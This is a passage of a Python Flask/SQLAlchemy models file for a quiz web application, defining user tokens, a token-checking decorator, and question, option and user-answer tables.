the question\")\r\n\r\n if str(answer) == str(answered_question.answer):\r\n user_question_asked.is_correct = True\r\n else:\r\n user_question_asked.is_correct = False\r\n user_question_asked.is_answered = True\r\n db.session.commit()\r\n\r\n def save_the_question_to_db(self, question_id):\r\n asked_question = Question.query.filter_by(id=question_id).first()\r\n current_app.logger.debug(\"[save_the_question_to_db] Asked Question\")\r\n current_app.logger.debug(asked_question)\r\n\r\n # Check if it the user was asked this question\r\n user_question = self.questions.filter_by(\r\n question_id=asked_question.id).first()\r\n current_app.logger.debug(\r\n \"[save_the_question_to_db] Existing User Question\")\r\n current_app.logger.debug(user_question)\r\n\r\n if not user_question:\r\n user_question = UserQuestion(user_id=self.id, question_id=asked_question.id,\r\n is_answered=False, is_correct=False)\r\n db.session.add(user_question)\r\n db.session.commit()\r\n current_app.logger.debug(\r\n \"[save_the_question_to_db] New User Question\")\r\n current_app.logger.debug(user_question)\r\n return user_question\r\n\r\n def create_reset_token(self, expires_in=3600):\r\n if not self.token:\r\n # '/' in the token will cause a routing error\r\n self.token = (base64.b64encode(os.urandom(24)).decode('utf-8')).replace('/','X')\r\n\r\n self.token_expire_time = datetime.utcnow() + timedelta(seconds=expires_in)\r\n return self.token if (expires_in > 1) else None\r\n\r\n def remove_token(self):\r\n self.create_reset_token(-1)\r\n\r\n def get_token(self):\r\n return self.token if (self.token_expire_time > datetime.utcnow()) else None\r\n\r\n def get_username(self):\r\n return self.first_name.capitalize() + ' ' + self.last_name.capitalize()\r\n\r\n @ staticmethod\r\n def verify_user_token(token):\r\n current_app.logger.debug(\"[verify_user_token] Token: \" + token)\r\n current_user = User.query.filter_by(token=token).first()\r\n return current_user if (current_user and current_user.token_expire_time > datetime.utcnow()) else None\r\n\r\n def to_dict(self):\r\n delta_time = datetime.utcnow() - self.created\r\n remaining_time = self.token_expire_time - datetime.utcnow()\r\n\r\n data = {\r\n 'id': self.id,\r\n 'username': self.get_username(),\r\n 'first_name': self.first_name,\r\n 'last_name': self.last_name,\r\n 'email': self.email,\r\n 'token_expire_time': self.token_expire_time.isoformat() + 'Z' if self.token_expire_time else None,\r\n 'delta_time_seconds': int(delta_time.total_seconds()),\r\n 'remaining_time_seconds': int(remaining_time.total_seconds()),\r\n }\r\n return data\r\n\r\n def from_dict(self, data):\r\n for field in ['first_name', 'last_name', 'email']:\r\n if field in data:\r\n setattr(self, field, data[field])\r\n\r\n setattr(self, 'token', self.create_reset_token())\r\n\r\n def __repr__(self):\r\n return ''.format(self.first_name + ' ' + self.last_name, self.email)\r\n\r\n\r\n# ------------------------------------------------------------------------------\r\n# Decorator for verifying the Token\r\n# ------------------------------------------------------------------------------\r\n\r\n\r\ndef token_required(f):\r\n @wraps(f)\r\n def decorated(*args, **kwargs):\r\n current_user_token = request.view_args['user_token'] if 'user_token' in request.view_args else None\r\n\r\n if not current_user_token:\r\n current_app.logger.debug(\"[token_required] No Token -> Register\")\r\n return redirect(url_for('auth.register'), code=307)\r\n\r\n current_user = User.verify_user_token(current_user_token)\r\n\r\n if current_user is None:\r\n current_app.logger.debug(\r\n \"[token_required] No user for token \" + current_user_token + \" -> Register\")\r\n return redirect(url_for('auth.register'))\r\n\r\n current_app.logger.debug(\r\n \"[token_required] User: \" + current_user.get_username())\r\n\r\n return f(current_user)\r\n\r\n return decorated\r\n# ------------------------------------------------------------------------------\r\n# Question Class\r\n# ------------------------------------------------------------------------------\r\n\r\n\r\nclass Question(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n body = db.Column(db.String(240), unique=True, nullable=False)\r\n answer = db.Column(db.String(60), unique=False, nullable=False)\r\n options = db.relationship('Option', backref='question', lazy='dynamic')\r\n files = db.relationship('File', backref='question', lazy='dynamic')\r\n users = db.relationship(\"UserQuestion\", backref=\"question\", lazy='dynamic')\r\n\r\n def to_dict(self):\r\n data = {\r\n 'id': self.id,\r\n 'body': self.body,\r\n 'answer': self.answer,\r\n 'options': ([option.to_dict() for option in self.options.all()]),\r\n 'files': ([file.to_dict() for file in self.files.all()]),\r\n }\r\n return data\r\n\r\n def __repr__(self):\r\n return ''.format(self.id, self.body, self.answer)\r\n\r\n\r\n# ------------------------------------------------------------------------------\r\n# Bridging Table Between User and their Questions\r\n# ------------------------------------------------------------------------------\r\n\r\nclass UserQuestion(db.Model):\r\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'), primary_key=True)\r\n question_id = db.Column(db.Integer, db.ForeignKey(\r\n 'question.id'), primary_key=True)\r\n is_answered = db.Column(db.Boolean, nullable=False, default=0)\r\n is_correct = db.Column(db.Boolean, nullable=False, default=0)\r\n db.UniqueConstraint('user_id', 'question_id', name='user_question_uix_1')\r\n users = db.relationship(\"User\", backref=\"question\")\r\n questions = db.relationship(\"Question\", backref=\"user\")\r\n\r\n def answered_already(self, user_id=99):\r\n current_app.logger.debug(\"[answered_already] User Id: \" + str(user_id))\r\n return self.query.filter_by(user_id=user_id, is_answered=1).order_by(self.question_id)\r\n\r\n def to_dict(self):\r\n data = {\r\n 'user_id': self.user_id,\r\n 'question_id': self.question_id,\r\n 'is_answered': self.is_answered,\r\n 'is_correct': self.is_correct,\r\n }\r\n return data\r\n\r\n def __repr__(self):\r\n return ''.format(self.user_id, self.question_id, self.is_correct)\r\n# ------------------------------------------------------------------------------\r\n# Option Class\r\n# ------------------------------------------------------------------------------\r\n\r\n\r\nclass Option(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n body = db.Column(db.String(240), unique=False, nullable=False)\r\n question_id = db.Column(db.Integer, db.ForeignKey('question.id'))\r\n is_answer = db.Column(db.Boolean, default=0)\r\n db.UniqueConstraint('body', 'question_id', name='question_option_uix_1')\r\n\r\n def to_dict(self):\r\n data = {\r\n 'id': self.id,\r\n 'body': self.body,\r\n 'question_id': self.question_id,\r\n 'is_answer': self.is_answer,\r\n }\r\n return data\r\n\r\n def __repr__(self):\r\n return '